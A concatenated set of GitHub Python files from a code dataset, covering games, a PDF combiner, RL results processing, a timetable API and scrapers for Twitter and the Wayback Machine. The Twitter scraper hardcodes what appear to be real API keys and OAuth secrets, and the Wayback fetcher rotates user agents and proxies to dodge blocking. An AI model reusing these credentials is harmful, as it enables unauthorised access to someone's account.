position(posX,y)\n positionDict = {\n \"Up\" : [0,-1,0,-2],\n \"Down\" : [0,1,0,2],\n \"Left\" : [-1,0,-2,0],\n \"Right\" : [1,0,2,0],\n }\n\n if keyPressed == \"Escape\":\n pygame.mixer.Channel(0).stop()\n root.destroy()\n\n if keyPressed in positionDict:\n moveScale = positionDict[keyPressed]\n x1 = posX+moveScale[0]\n y1 = posY+moveScale[1]\n x2 = posX+moveScale[2]\n y2 = posY+moveScale[3]\n coordinateMove(x1, y1, x2, y2) \n\n elif keyPressed == \"space\": # Press SPACE\n print(\"Press Space\", event.char)\n trigger = 0\n icy = doory = None\n mapList = copy.deepcopy(allMapList[level]) # Reset the map\n drawGameImage()\n\n# Determine whether position is within the frame\ndef validArea(row, col):\n return (row >= 0 and row < mapLength and col >= 0 and col < mapWidth)\n\ndef coordinateMove(x1, y1, x2, y2):\n global posX, posY, trigger, icy, doory\n moveTo = None\n behindeMoveTo = None\n if validArea(x1, y1): \n moveTo = mapList[x1][y1] \n if validArea(x2, y2):\n behindeMoveTo = mapList[x2][y2]\n if moveTo == '0': # Able to move to moveTo\n MoveMan(posX, posY) \n posX = x1 \n posY = y1 \n mapList[x1][y1] = 'me' \n pygame.mixer.music.load(walk)\n pygame.mixer.music.play(loops = 0, start=0.0, fade_ms=0)\n\n\n if (moveTo in walls) or not validArea(x1, y1):\n # moveTo is wall or out of the game area\n return \n if moveTo in letters: # moveTo has a letter\n if (behindeMoveTo in walls) or not validArea(x1, y1) or behindeMoveTo in letters: ##behindeMoveTo is wall or out of the game area\n return \n if moveTo in letters and behindeMoveTo == '0':\n MoveMan(posX, posY) \n posX = x1 \n posY = y1 \n mapList[x2][y2] = moveTo \n mapList[x1][y1] = 'me'\n pygame.mixer.music.load(moveBox)\n pygame.mixer.music.play(loops = 0, start=0.0, fade_ms=0)\n\n if level == 0:\n if trigger == 0 and triggerEffect() == True:\n pygame.mixer.music.load(melting)\n pygame.mixer.music.play(loops = 0, start=0.0, fade_ms=0)\n trigger += 1\n updateIce()\n \n elif trigger == 1:\n root.after_cancel(icy)\n icy = None\n trigger += 1\n mapList[6][6] = '0'\n mapList[7][6] = '0'\n mapList[8][6] = '0'\n\n elif level == 1:\n if trigger == 0 and triggerEffect() == True:\n pygame.mixer.music.load(doorOpen)\n pygame.mixer.Channel(0).play(pygame.mixer.Sound(doorOpen))\n trigger += 1\n updateDoor()\n \n elif trigger == 1:\n root.after_cancel(doory)\n doory = None\n trigger += 1\n mapList[12][2] = 'O4'\n mapList[11][3] = '0'\n mapList[11][4] = '0'\n mapList[12][5] = 'O4'\n \n elif level == 2:\n if triggerEffect() == True:\n pygame.mixer.music.stop()\n pygame.mixer.Channel(0).stop()\n pygame.mixer.music.load(wuhu)\n pygame.mixer.music.play(loops = -1, start=0.0, fade_ms=0)\n showinfo(message = f\"Wuhu! You've past the whole game!\")\n\n if IsFinish():\n showinfo(message = f\"You've Passed Level {level+1}! \")\n nextLevel()\n drawGameImage()\n \ndef MoveMan(posX, posY):\n if mapList[posX][posY] == 'me':\n mapList[posX][posY] = '0' \n\ndef triggerEffect():\n target = [[\"HEAT\",\"FIRE\"],[\"KEY\"],[\"AIR\"]]\n for words in target[level]:\n length = len(words)\n for col in range(len(mapList[0])):\n for row in range(len(mapList)-length+1):\n secret = ''.join([mapList[row+i][col] for i in range(length)])\n if secret == words:\n return True\n elif secret == \"AmeR\" and words == \"AIR\":\n return True\n elif secret == \"FmeRE\" and words == \"FIRE\":\n return True\n return False\n\ndef IsFinish(): # Whether finish\n global level\n bFinish = False \n if level == 0:\n if(mapList[6][6] == 'me' or\n mapList[7][6] == 'me'or\n mapList[8][6] == 'me'):\n bFinish = True\n elif level == 1:\n if(mapList[11][3] == 'me' or\n mapList[11][4] == 'me'):\n bFinish = True\n return bFinish\n\ndef nextLevel():\n global mapList, level, trigger\n trigger = 0\n level += 1\n mapList = copy.deepcopy(allMapList[level])\n drawGameImage()\n\ncv = Canvas(root, bg='black', width=800, height=400)\nmapList = copy.deepcopy(allMapList[level])\ndrawGameImage()\ncv.bind(\"\", callback)\ncv.pack()\ncv.focus_set() # Focus on cv\nroot.after(0, update, 0)\nroot.update\nroot.mainloop()\n#Gameover stop the music\n","repo_name":"Wuuuzula/wuHu-TakeOff","sub_path":"2022 CMU Hackathon_wuHu/wordPushingGame.py","file_name":"wordPushingGame.py","file_ext":"py","file_size_in_byte":9987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6848414854","text":"import tkinter as tk\nfrom business import combiner\nfrom guicomponents import DirectorySelectRow, ProgressBar, RowButton, TreeViewFrame\nfrom guicomponents.config import *\nfrom os import path\nfrom tkinter import messagebox, ttk\nfrom utils.helper_methods import prompt_to_open_folder\n\nSELECT_SOURCE_FOLDER_MESSAGE = 'Select Source Folder'\nSELECT_DESTINATION_FOLDER_MESSAGE = 'Select Output Folder'\nSOURCE_IID = 'source'\n\n\nclass PdfCombinerFrame(tk.Frame):\n \"\"\"\n Control the state of the directories we choose from.\n \"\"\"\n\n def __init__(self, parent):\n \"\"\"\n Initialize the GUI with the necessary components\n \"\"\"\n self.parent = parent\n super().__init__(parent)\n self.pack(fill=tk.BOTH, expand=True)\n\n # Source folder selection\n self.source_directory_var = tk.StringVar(self)\n self.source_select_row = DirectorySelectRow(self,\n self.source_directory_var,\n 'Source Folder:',\n SELECT_SOURCE_FOLDER_MESSAGE,\n self.set_preview_tree)\n\n # Optional checkboxes for jpegs and xps file conversion\n filetypes_frame = ttk.Frame(self)\n filetypes_frame.pack(fill=tk.X, padx=PAD_X_AMOUNT, pady=PAD_Y_AMOUNT)\n\n filetypes_label = ttk.Label(filetypes_frame, text='Non-pdf filetypes to also merge: ')\n filetypes_label.pack(side=tk.LEFT)\n\n self.include_jpg_var = tk.BooleanVar(self)\n jpg_checkbox = ttk.Checkbutton(filetypes_frame, text=\"JPG\", variable=self.include_jpg_var,\n command=self.set_preview_tree)\n jpg_checkbox.pack(side=tk.LEFT)\n\n self.include_xps_var = tk.BooleanVar(self)\n xps_checkbox = ttk.Checkbutton(filetypes_frame, text=\"XPS\", variable=self.include_xps_var,\n command=self.set_preview_tree)\n xps_checkbox.pack(side=tk.LEFT)\n\n # Get child directories and display\n self.preview_frame = TreeViewFrame(self)\n\n # Destination folder selection\n self.destination_directory_var = tk.StringVar(self)\n self.destination_select_row = DirectorySelectRow(self,\n self.destination_directory_var,\n 'Destination Folder:',\n SELECT_DESTINATION_FOLDER_MESSAGE)\n self.progress_bar = ProgressBar(self,\n task_func=self.combine_pdfs_task,\n task_outcome_func_map=self.get_msg_task_map(),\n progress_title='Combining Pdfs',\n progress_text='Combining Pdfs...')\n\n # Combine pdfs button\n self.combinePdfsButton = RowButton(\n self,\n text='Combine PDFs',\n command=self.combine_button_listener\n )\n\n def combine_button_listener(self):\n \"\"\"\n Validate we have the data we need to perform action and then go for it\n \"\"\"\n if self.source_directory_var.get() is None or len(self.source_directory_var.get()) == 0:\n messagebox.showerror(SELECT_SOURCE_FOLDER_MESSAGE, \"You must select a folder to read the pdfs from!\")\n elif self.destination_directory_var.get() is None or len(self.destination_directory_var.get()) == 0:\n messagebox.showerror(SELECT_DESTINATION_FOLDER_MESSAGE, \"You must select a folder to save the pdfs in!\")\n else:\n try:\n self.toggle_button_disable(True)\n self.progress_bar.perform_action()\n except Exception as e:\n print(e)\n messagebox.showerror(\"Error\", \"An unexpected error occurred, please try again.\")\n\n def combine_pdfs_task(self, signal_queue, progress_var):\n \"\"\"\n Perform the actual pdf merging\n \"\"\"\n try:\n result_files = []\n directories_list = [self.source_directory_var.get()] + \\\n combiner.get_child_dirs(self.source_directory_var.get())\n # combine pdfs in first layer of children\n for directory in directories_list:\n print(\"Combining files in: {}\".format(directory))\n result_file = combiner.combine_docs_in_directory(directory,\n self.destination_directory_var.get(),\n include_jpg=self.include_jpg_var.get(),\n include_xps=self.include_xps_var.get(),\n progress_var=progress_var)\n if result_file:\n result_files.append(result_file)\n\n # print results to stdout\n print(\"Finished combining all pdfs. Written files: \")\n for result_file in result_files:\n print(\"* {}\".format(result_file))\n if len(result_files) > 0:\n signal_queue.put(TASK_FINISHED_MESSAGE)\n else:\n signal_queue.put(TASK_NOOP_MESSAGE)\n except Exception as e:\n print(e)\n signal_queue.put(TASK_ERROR_MESSAGE)\n finally:\n self.toggle_button_disable(False)\n\n def get_msg_task_map(self):\n return {\n TASK_FINISHED_MESSAGE: lambda: prompt_to_open_folder(self.destination_directory_var.get(),\n message_text=\"We have successfully \"\n \"merged the files. Open \"\n \"destination folder?\"),\n TASK_ERROR_MESSAGE: lambda: messagebox.showerror(\"Error!\",\n \"Encountered an error \"\n \"when trying to combine pdfs.\"),\n TASK_NOOP_MESSAGE: lambda: messagebox.showerror(\"No Files Found!\",\n \"No files were found to combine in your directory!\")\n }\n\n def set_preview_tree(self):\n \"\"\"\n Set the tree-view previewing which files to aggregate.\n I hate this method but I'm too lazy to clean it up.\n \"\"\"\n preview_tree = self.preview_frame.preview_tree\n # clear it out first\n preview_tree.delete(*preview_tree.get_children())\n file_count = 0 # total number of files we plan on combining, used to track progress\n if self.source_directory_var.get():\n # source directory we selected as the root\n preview_tree.insert('',\n 'end',\n SOURCE_IID,\n text=path.split(self.source_directory_var.get())[1],\n open=True)\n # display any pdfs in root\n root_pdfs = combiner.get_files_to_merge_in_dir(self.source_directory_var.get(),\n include_jpg=self.include_jpg_var.get(),\n include_xps=self.include_xps_var.get())\n for root_pdf in root_pdfs:\n preview_tree.insert(SOURCE_IID,\n 'end',\n text=path.split(root_pdf)[1])\n file_count = len(root_pdfs)\n\n # get all its child directories\n children = combiner.get_child_dirs(self.source_directory_var.get())\n for child in children:\n preview_tree.insert(SOURCE_IID,\n 'end',\n child,\n text=path.split(child)[1])\n # any of its pdfs there\n child_pdfs = combiner.get_files_to_merge_in_dir(child,\n include_jpg=self.include_jpg_var.get(),\n include_xps=self.include_xps_var.get())\n for child_pdf in child_pdfs:\n preview_tree.insert(child,\n 'end',\n text=path.split(child_pdf)[1])\n\n file_count = file_count + len(child_pdfs)\n self.progress_bar.progress_goal = file_count\n\n # toggle whether the combine and select directory labels are disabled\n def toggle_button_disable(self, disabled):\n if disabled:\n print(\"buttons disabled\")\n self.source_select_row.button[STATE_KEY] = tk.DISABLED\n self.destination_select_row.button[STATE_KEY] = tk.DISABLED\n self.combinePdfsButton[STATE_KEY] = tk.DISABLED\n else:\n print(\"buttons enabled\")\n self.source_select_row.button[STATE_KEY] = tk.NORMAL\n self.destination_select_row.button[STATE_KEY] = tk.NORMAL\n self.combinePdfsButton[STATE_KEY] = tk.NORMAL\n","repo_name":"mbaker341997/pdf_combiner","sub_path":"pdf_combiner_frame.py","file_name":"pdf_combiner_frame.py","file_ext":"py","file_size_in_byte":9421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15377062476","text":"import numpy as np\nimport sys\nfrom argparse import Namespace\nimport argparse\nimport Params\nimport scipy.stats.mstats\nimport Environments\nimport gym\n\nfinal_data = {\n}\n\nMAX_ITERS = 25\n\ndef extrapolate_linearly(x, arr):\n out = np.matrix(np.zeros((len(x),)))\n out[0,0:len(arr)] = arr\n increments = np.array([arr[-1] + (i+1)*arr[-1]/len(arr) for i in range(len(x) - len(arr))])\n out[0,len(arr):] = increments\n return (out)\n\ndef get_p_idx(data,p,threshold,fail):\n perc = np.percentile(data,p,axis=0)\n (ix,) = np.where(perc > threshold)\n if len(ix) != 0:\n idx = 100*(ix[0]+1)\n else:\n idx = fail\n return(idx)\n\ndef get_f_idx(data,p,fail):\n quantized = np.minimum(data, 1)\n perc = np.mean(quantized,axis=0)\n (ix,iy) = np.where(perc > p/100)\n if len(ix) != 0:\n idx = 100*(iy[0]+1)\n else:\n idx = fail\n return(idx)\n\ndef load_data(alg,env,model,ep1,ep2):\n print(\"Loading data for %s %s %s %s %s\" % (alg, env, model, ep1, ep2), flush=True)\n arr = {'solve':[],\n 'solve_low':[],\n 'solve_high':[],\n 'find':[],\n 'find_low':[],\n 'find_high':[]}\n solve_best = {}\n find_best = {}\n\n ### Solve is when average reward is 0.5*vstar\n E = gym.make(env)\n E.init(env_config={'dimension':1})\n threshold= 0.5*E.vstar\n T = Params.LockEpisodes[alg][0]\n x = np.arange(100,T+1,100)\n fail = 100*(len(x)+1)\n Params.reset_params()\n solve_median = {}\n solve_high = {}\n solve_low = {}\n find_median = {}\n find_high = {}\n find_low = {}\n hyperparams = {}\n for arg_list in Params.Parameters[env][alg]:\n P = Params.Params(arg_list)\n if str(P.env_param_1) != ep1 or str(P.env_param_2) != ep2 or str(P.model_type) != model:\n continue\n collated = None\n for i in range(1,MAX_ITERS+1):\n P.iteration = i\n fname = P.get_output_file_name()\n try:\n f = open(fname)\n except Exception:\n continue\n tmp = np.loadtxt(f,delimiter=',',dtype=float)\n tmp2 = extrapolate_linearly(x,tmp)\n if collated is None:\n collated = np.matrix(tmp2)\n else:\n collated = np.vstack((collated,tmp2))\n if collated is None:\n continue\n if P.horizon not in hyperparams.keys():\n hyperparams[P.horizon] = []\n solve_median[P.horizon] = []\n solve_high[P.horizon] = []\n solve_low[P.horizon] = []\n find_median[P.horizon] = []\n find_high[P.horizon] = []\n find_low[P.horizon] = []\n hyperparams[P.horizon].append(str(P))\n normalized = collated/x\n solve_median[P.horizon].append(get_p_idx(normalized, 50, threshold, fail))\n solve_low[P.horizon].append(get_p_idx(normalized, 90, threshold, fail))\n solve_high[P.horizon].append(get_p_idx(normalized, 10, threshold, fail))\n find_median[P.horizon].append(get_f_idx(collated, 50, fail))\n find_low[P.horizon].append(get_f_idx(collated, 10, fail))\n find_high[P.horizon].append(get_f_idx(collated, 90, fail))\n\n ### Now that we have preprocessed, find best parameter for each horizon\n lst = list(hyperparams.keys())\n lst.sort()\n for h in lst:\n idx = None\n min = np.min(solve_high[h])\n if idx is None and min < fail:\n idx = np.argmin(solve_high[h])\n min = np.min(solve_median[h])\n if idx is None and min < fail:\n idx = np.argmin(solve_median[h])\n min = np.min(solve_low[h])\n if idx is None and min < fail:\n idx = np.argmin(solve_low[h])\n if idx is None:\n print(\"SOLVE: H=%d, Time=Failure\" % (h), flush=True)\n arr['solve'].append(fail)\n arr['solve_high'].append(fail)\n arr['solve_low'].append(fail)\n solve_best[h] = None\n else:\n arr['solve'].append(solve_median[h][idx])\n arr['solve_high'].append(solve_high[h][idx])\n arr['solve_low'].append(solve_low[h][idx])\n print(\"SOLVE: H=%d, Median=%d, Low=%d, High=%d\" % (h, arr['solve'][-1], arr['solve_low'][-1], arr['solve_high'][-1]), flush=True)\n solve_best[h] = hyperparams[h][idx]\n idx = None\n min = np.min(find_high[h])\n if idx is None and min < fail:\n idx = np.argmin(find_high[h])\n min = np.min(find_median[h])\n if idx is None and min < fail:\n idx = np.argmin(find_median[h])\n min = np.min(find_low[h])\n if idx is None and min < fail:\n idx = np.argmin(find_low[h])\n if idx is None:\n print(\"FIND: H=%d, Time=Failure\" % (h), flush=True)\n arr['find'].append(fail)\n arr['find_high'].append(fail)\n arr['find_low'].append(fail)\n find_best[h] = None\n else:\n arr['find'].append(find_median[h][idx])\n arr['find_high'].append(find_high[h][idx])\n arr['find_low'].append(find_low[h][idx])\n print(\"FIND: H=%d, Median=%d, Low=%d, High=%d\" % (h, arr['find'][-1], arr['find_low'][-1], arr['find_high'][-1]), flush=True)\n find_best[h] = hyperparams[h][idx]\n arr['horizons'] = lst\n return (arr, find_best, solve_best)\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='StateDecoding Postprocessing Script')\n parser.add_argument('--env', type=str, default=\"Lock-v0\",\n help='Environment', choices=[\"Lock-v0\", \"Lock-v1\", \"Lock-v2\"])\n parser.add_argument('--alg', type=str, default=\"decoding\",\n help='Environment', choices=[\"decoding\", \"oracleq\", \"qlearning\"])\n parser.add_argument('--model_type', type=str, default=\"linear\",\n help='Base Learner', choices=[\"nn\", \"linear\"])\n parser.add_argument('--env_param_1', type=str, default=\"0.0\",\n help='Environment', choices=[\"0.0\", \"0.1\"])\n parser.add_argument('--env_param_2', type=str, default=\"None\",\n help='Environment parameter', choices=[\"None\", \"0.1\", \"0.2\", \"0.3\", \"0.5\"])\n args = parser.parse_args()\n return(args)\n\nif __name__=='__main__':\n args = parse_args()\n (arr, find_best, solve_best) = load_data(args.alg, args.env, args.model_type, args.env_param_1, args.env_param_2)\n if args.alg == 'qlearning':\n (fail,find_fail, solve_fail) = load_data('qlearning_fail', args.env, args.model_type, args.env_param_1, args.env_param_2)\n arr['solve'][2] = fail['solve'][0]\n arr['find'][3] = fail['find'][1]\n arr['solve_low'][2] = fail['solve_low'][0]\n arr['find_low'][3] = fail['find_low'][1]\n arr['solve_high'][2] = fail['solve_high'][0]\n arr['find_high'][3] = fail['find_high'][1]\n find_best[20] = find_fail[20]\n solve_best[15] = solve_fail[15]\n print(fail)\n\n import pickle\n pickle.dump((arr, find_best, solve_best), open(\"./pkls/%s_%s_%s_%s_%s.pkl\" %(args.env, args.alg, args.model_type, args.env_param_1, args.env_param_2), \"wb\"))\n\n","repo_name":"microsoft/StateDecoding","sub_path":"Postprocess.py","file_name":"Postprocess.py","file_ext":"py","file_size_in_byte":7149,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"18"} +{"seq_id":"72395006439","text":"from optapy import solver_factory_create\nfrom optapy import config\nfrom fastapi import APIRouter\nfrom optapy.types import Duration\nfrom models.lesson import Lesson\nfrom models.timetable import TimeTable\nfrom libs.constraints import define_constraints\nfrom utils.problem import generate_problem\nfrom services.api import Api\nfrom utils.color import pick_color\n\nmain_router = APIRouter(prefix=\"/api\", tags=[\"api\"])\n\n\n@main_router.get(\"/timetable\")\nasync def get_timetable():\n solver_config = (\n config.solver.SolverConfig()\n .withEntityClasses(Lesson)\n .withSolutionClass(TimeTable)\n .withConstraintProviderClass(define_constraints)\n .withTerminationSpentLimit(Duration.ofSeconds(120))\n ) \n\n solution: TimeTable = (\n solver_factory_create(solver_config).buildSolver().solve(generate_problem())\n )\n print(solution)\n timeslot_list = solution.timeslot_list\n lesson_list = solution.lesson_list\n room_list = solution.room_list\n\n lesson_matriz = [\n [[] for _ in range(len(room_list))] for _ in range(len(timeslot_list))\n ]\n\n for lesson in lesson_list:\n lesson_timeslot_id = lesson.timeslot.id\n lesson_room_id = lesson.room.id\n c = pick_color(lesson.subject)\n lesson.set_color(c)\n lesson_matriz[lesson_timeslot_id][lesson_room_id].append(lesson)\n return {\n \"timeslot_list\": timeslot_list,\n \"room_list\": room_list,\n \"lesson_matriz\": lesson_matriz,\n }\n\n\n@main_router.get(\"/test\")\nasync def test():\n api = Api()\n return {\n \"lessons\": api.get_lessons(),\n \"rooms\": api.get_rooms(),\n }\n","repo_name":"carlosCACB333/schedule_prediction","sub_path":"app/routes/mainRoute.py","file_name":"mainRoute.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23414661419","text":"import json\r\nimport tweepy\r\n\r\nCONSUMER_KEY = 'qBbQVx7x5Z8qQGdvwVddGpYsh'\r\nCONSUMER_SECRET = 'DKeUNiZGCoeDX7Lri8eNTmdEqSNMbu8wfaf700Y7NCNEqPRDZY'\r\nOAUTH_TOKEN = '1675967766-vbbn8baYe0e4t2zYpGv1O5jxdVBgeqCgeo2g17L'\r\nOAUTH_TOKEN_SECRET = 'j32CXSmvGVcP4VhVfl9JHwsOLRCOMIlvKjNRHznufRhmD'\r\n\r\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\r\nauth.set_access_token(OAUTH_TOKEN, OAUTH_TOKEN_SECRET)\r\n\r\napi = tweepy.API(auth)\r\ncount =900\r\nres = tweepy.Cursor(api.search,\r\n q=\"“bernie sanders\",\r\n since = \"2019-04-06\",\r\n until = \"2019-04-07\",\r\n result_type='mixed',\r\n include_entities=True,\r\n monitor_rate_limit=False,\r\n wait_on_rate_limit=False,\r\n tweet_mode= 'extended').items(100)\r\nfor i in res:\r\n print(count)\r\n with open('BS/data_'+str(count)+'.txt', 'w') as outfile:\r\n json.dump(i._json, outfile)\r\n count += 1\r\n print(\"=================\")\r\n\r\n\r\n","repo_name":"bucky1995/CS_539_ML","sub_path":"hw4/Data.py","file_name":"Data.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73027220520","text":"import json\nimport requests\nfrom unified.core.auth import Auth\n\n\ndef get_acess_token(headers):\n auth_info = {\n \"client_id\": headers['client_id'],\n \"client_secret\": headers['client_secret'],\n \"token\": headers['refresh_token'],\n \"refresh_url\": headers['token_url']\n }\n token = Auth().get_oauth2_token(auth_info)\n\n return json.loads(token)['access_token']\n\n\ndef rest(method, url, body, access_token):\n ''' returns response from request'''\n \n headers = {\n 'Authorization': f'Bearer {access_token}',\n 'Content-Type': 'application/json'\n }\n if method == \"DELETE\":\n headers = {\n 'Authorization': f'Bearer {access_token}'\n }\n response = requests.request(method, url, headers=headers, data=body)\n\n return response\n","repo_name":"dipendrabaidawa/unified_api","sub_path":"unified/modules/main/categories/email_newsletters/aweber/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29396422488","text":"\"\"\"\nFetchs wayback machine for URLs against a query and uses randomly shuffled user agents list\n\nexample URLs.txt\n\nhttp://web.archive.org/web/*/dog%20and%20cat\nhttp://web.archive.org/web/*/houses\nhttp://web.archive.org/web/*/writing%20blogs\nhttp://web.archive.org/web/*/ultra%20fine\n...\n\n\nOR, just the queries 1 per line:\n\nexample URLs.txt\n\ndog and cat\nhouses\nwriting blogs\nultra fine\n...\n\nexample user-agents.txt\n\nMozilla/5.0 (Amiga; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14\nMozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en-US; rv:1.8.1.21) Gecko/20090303 SeaMonkey/1.1.15\nMozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14\n...\n\n\"\"\"\nclass fetch_wayback_machine():\n def __init__(self):\n self.args = None\n self._proxy_index = -1\n self.parse_args()\n\n \"\"\"\n Parses CLI arguments. Used to assert all arguments are handles correctly.\n \"\"\"\n def parse_args(self):\n import argparse\n\n parser = argparse.ArgumentParser()\n\n # required arguments\n required = parser.add_argument_group('required arguments')\n required.add_argument('-u', '--urls', metavar='', help='URLs to fetch (file path)', type=lambda s: self.file_path_validator(s), required=True)\n\n # optional arguments\n optional = parser.add_argument_group('optional arguments')\n optional.add_argument('-ua', '--user-agents', metavar='', help='User agents to use (file path)', type=lambda s: self.file_path_validator(s, False), required=False)\n optional.add_argument('-m', '--max-workers', metavar='', help='Max workers to use for threading', type=int, required=False)\n optional.add_argument('-s', '--save-to', metavar='', help='Distination file path', type=str, required=False)\n optional.add_argument('-p', '--proxy', metavar='', help='Proxy address', type=str, required=False)\n optional.add_argument('-pf', '--proxies-file', metavar='', help='Use a list of proxies (file path)', type=lambda s: self.file_path_validator(s, False), required=False)\n optional.add_argument('-l', '--log-errors', metavar='', help='Log errors to a file', type=str, required=False)\n optional.add_argument('-xh', '--exclude-hosts', metavar='', help='Exclude hosts (query-suggested domains)', type=bool, required=False, default=False)\n\n # parse arguments\n self.args = vars(parser.parse_args())\n\n \"\"\"\n Validate file path CLI argument.\n \"\"\"\n def file_path_validator(self, path, required=True):\n from os.path import exists\n from argparse import ArgumentTypeError\n\n if not path and not required:\n return\n\n if not exists( path ):\n raise ArgumentTypeError(\"%s is an invalid file path\" % str(path))\n\n return path\n\n \"\"\"\n Fetches the wayback machine for anchors and hosts\n This is passed to a thread to execute with arguments\n \"\"\"\n def task_runner(self, args):\n import requests\n from json import loads\n\n anchors_url = 'http://web.archive.org/__wb/search/anchor?q=%s' % args['query']\n hosts_url = 'http://web.archive.org/__wb/search/host?q=%s' % args['query']\n res = {'query': args['query']}\n\n kwargs = dict(headers={'User-agent': args['user_agent']})\n if not kwargs['headers']['User-agent']: del kwargs['headers']['User-agent']\n\n if 'proxies' in args and args['proxies']:\n self._proxy_index+=1\n\n if self._proxy_index >= len( args['proxies'] ):\n self._proxy_index = 0\n\n proxy = args['proxies'][ self._proxy_index ]\n kwargs['proxies'] = {'http' + ( 's' if 'https://' in proxy else '' ): proxy}\n\n try:\n try:\n r = requests.get(anchors_url, **kwargs)\n objects = r.json()\n\n if objects and len(objects):\n res['anchors'] = [ x['link'] for x in objects ]\n else:\n res['anchors'] = []\n except Exception as e:\n res['error'] = str(e)\n return res\n\n if not self.args['exclude_hosts']:\n try:\n r = requests.get(hosts_url, **kwargs)\n objects = r.json()\n\n if objects and 'hosts' in objects.keys() and len(objects['hosts']):\n res['hosts'] = [ x['display_name'] for x in objects['hosts'] ]\n except Exception as e:\n pass\n except KeyboardInterrupt:\n pass\n\n return res\n\n def run(self):\n # first, load the URLs\n from urllib.parse import unquote\n from os.path import basename\n\n queries = []\n query_urls = {}\n with open( self.args['urls'] ) as f:\n while True:\n raw_url = f.readline().rstrip()\n url = unquote( raw_url )\n if not url: break\n query = basename( url )\n\n if query:\n queries.append( query.rstrip() )\n query_urls[ query.rstrip() ] = raw_url\n\n if not queries:\n print ( 'No URLs retrieved.' )\n return\n\n # load user agents\n\n user_agents = []\n if self.args['user_agents']:\n with open( self.args['user_agents'] ) as f:\n while True:\n agent = f.readline().rstrip()\n if not agent: break\n user_agents.append( agent )\n\n from random import shuffle\n shuffle( user_agents )\n \n # max workers validate\n self.args['max_workers'] = self.args['max_workers'] if int(self.args['max_workers']) > 0 else 1\n\n # load proxies\n\n proxies = []\n if self.args['proxies_file']:\n with open( self.args['proxies_file'] ) as f:\n while True:\n proxy = f.readline().rstrip()\n if not proxy: break\n proxies.append( proxy )\n\n if not proxies and self.args['proxy']:\n proxies = [ self.args['proxy'] ]\n\n from concurrent.futures import ThreadPoolExecutor\n from time import sleep\n executor = ThreadPoolExecutor(max_workers=self.args['max_workers'])\n\n json_obj = {}\n object_lines = []\n\n try:\n query_list = []\n for query in queries: query_list.append( {'query': query, 'user_agent': user_agents.pop() if user_agents else None, 'proxies': proxies} )\n for res in executor.map(self.task_runner, [x for x in query_list]):\n json_obj[ query_urls[ res['query'] ] ] = res\n\n if not res:\n pass\n elif 'error' in res.keys():\n if not self.args['log_errors']:\n from sys import stderr\n else:\n stderr = open(self.args['log_errors'], 'a')\n\n print ( '%s ended with an error: %s' % ( query_urls[ res['query'] ], res['error'] ), file=stderr )\n elif 'hosts' in res.keys() or 'anchors' in res.keys():\n\n if 'anchors' in res.keys() and len(res['anchors']):\n for anchor in res['anchors']: object_lines.append( anchor )\n\n if 'hosts' in res.keys() and len(res['hosts']):\n for host in res['hosts']: object_lines.append( host )\n except KeyboardInterrupt:\n pass\n except Exception as e:\n print ( 'Caught exception: %s' % (e) )\n\n if not len( json_obj.keys() ):\n return\n\n if self.args['save_to']:\n from os.path import realpath\n try:\n with open( self.args['save_to'], 'w' ) as f: f.write( '\\n'.join( object_lines ) + '\\n' )\n print ( 'Saved to %s' % realpath(self.args['save_to']) ) \n except Exception as e:\n print ( 'Saving to %s ended with an error: %s' % ( realpath(self.args['save_to']), str(e) ) )\n print ( '\\n'.join( object_lines ) )\n else:\n # just print to stdout\n print ( '\\n'.join( object_lines ) )\n\nif '__main__' == __name__:\n app = fetch_wayback_machine()\n app.run()\n","repo_name":"elhardoum/scrape-wayback-machine","sub_path":"fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":8321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16235005859","text":"# -*- coding: UTF-8 -*-\nfrom __future__ import unicode_literals\n\n\nRESTYPE = {\n 'Director': 1,\n 'Storage': 2,\n 'FileDaemon': 3,\n 'Client': 4,\n 'Messages': 5,\n 'Catalog': 6,\n 'Schedule': 7,\n 'Job': 8,\n 'JobDefs': 9,\n 'Fileset': 10,\n 'Pool': 11,\n 'Device': 12,\n 'Autochanger': 13,\n 'Include': 14,\n 'Exclude': 15,\n 'Options': 16,\n 'SDAddresses': 17,\n 'IP': 18,\n}\n","repo_name":"empereira/IBAdmin","sub_path":"config/restype.py","file_name":"restype.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"18497734331","text":"import numpy as np\nimport pandas as pd\n\ndef search(id):\n user_data = pd.read_csv(\"util/user_profile.csv\", encoding=\"cp949\")\n IDs = user_data[\"id\"].values.tolist()\n for people in IDs:\n if(id==people):\n return True\n return False","repo_name":"mumwa/caregiver-Soon","sub_path":"util/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1874039958","text":"import pygame\nimport random\n\n# Set up the window and font\npygame.init()\nWINDOW_WIDTH, WINDOW_HEIGHT = 800, 600\nFONT_SIZE = 32\nfont = pygame.font.SysFont(None, FONT_SIZE)\nwindow = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\npygame.display.set_caption(\"Bubble Sort Visualizer\")\n\n# Set up the array and variables\nARRAY_SIZE = 50\narray = [random.randint(1, 100) for _ in range(ARRAY_SIZE)]\ni = 0\nj = 0\ndone = False\n\n# Set up the colors\nWHITE = (255, 255, 255)\nBLACK = (0, 